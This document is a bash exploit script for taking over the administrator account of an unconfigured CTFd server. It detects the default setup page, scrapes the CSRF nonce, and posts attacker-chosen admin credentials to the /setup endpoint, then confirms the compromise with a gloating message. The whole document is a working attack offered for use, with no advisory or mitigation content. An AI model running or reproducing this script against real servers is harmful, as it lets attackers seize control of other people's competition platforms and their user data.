CTFd Administrator Account TakeOver

1. #!/bin/bash
2.  
3. clear
4. read -p "Enter Target Address Followed by Port: " target port   # localhost 8080
5.  
6. if [ $port -lt 65536 ] && [ $port -gt 0 ]; then
7.   curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' $target:$port/setup > preexp  #Downloaded to check <title>, <h1> and nonce values.
8. else
9.     echo "Incorrect Port."
10. fi
11.  
12. titleCheck=$(grep '<title>CTFd</title>' preexp)          #If server is not configured, default <title> value is 'CTFd' until admin changes
13. headerOneCheck=$(grep '<h1>Setup</h1>' preexp)          #Due to the possibility of admin naming server to 'CTFd', a check for <h1> value 'Setup' is made to double check.
14. nonce=$(grep 'var csrf_nonce' preexp | awk '{print $4}' | sed 's/.//;s/..$//')  #This nonce will include cookie value of 'session=00000000-0000-0000-0000-000000000000' so don't worry;)
15. rm preexp
16.  
17. if [ $titleCheck = "<title>CTFd</title>" ] && [ $headerOneCheck = "<h1>Setup</h1>" ]; then
18.   read -p "Target is Vulnerable, Would you Like to Attack? (Y/n): " attack
19.   if [ "$attack" = 'y' ] || [ "$attack" = 'Y' ]; then
20.     clear
21.     read -p 'CTF Name: ' ctfName      #Name for the CTF
22.     read -p 'Admin Username: ' adminName    #Username for the administration account
23.     read -p 'Admin Email: ' adminEmail    #Email address for the administration account
24.     read -p 'Admin Password: ' adminPassword  #Password for the administration account
25.     read -p 'User Mode (teams/users): ' userMode  #Dictates whether users join teams to play (Team Mode) or play as themselves (User Mode)
26.     clear
27.  
28.     echo Working on it...
29.     curl --silent -i -X POST -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' --data 'nonce='$nonce'&ctf_name='$ctfName'&name='$adminName'&email='$adminEmail'&password='$adminPassword'&user_mode='$userMode'' http://$target:$port/setup  #Send previously entered values to $target
30.     clear
31.     echo Attack Executed!
32.  
33.     curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' $target:$port/setup > postexp  #Verify successful exploit
34.     titleCheck=$(grep '<title>CTFd</title>' postexp)
35.     headerOneCheck=$(grep '<h1>Setup</h1>' postexp)
36.     rm postexp
37.  
38.     if [ $titleCheck = "<title>CTFd</title>" ] && [ $headerOneCheck = "<h1>Setup</h1>" ]; then  #Values should be diffrent from what we started with pre-setup
39.       clear
40.       echo Something went Wrong, Try Again.
41.     else
42.       clear
43.       echo 'CTFd Server Hosted @ '$target' has been Comprimised:)'
44.     fi
45.   fi
46. else
47.   echo Something went Wrong, Try Again.
48. fi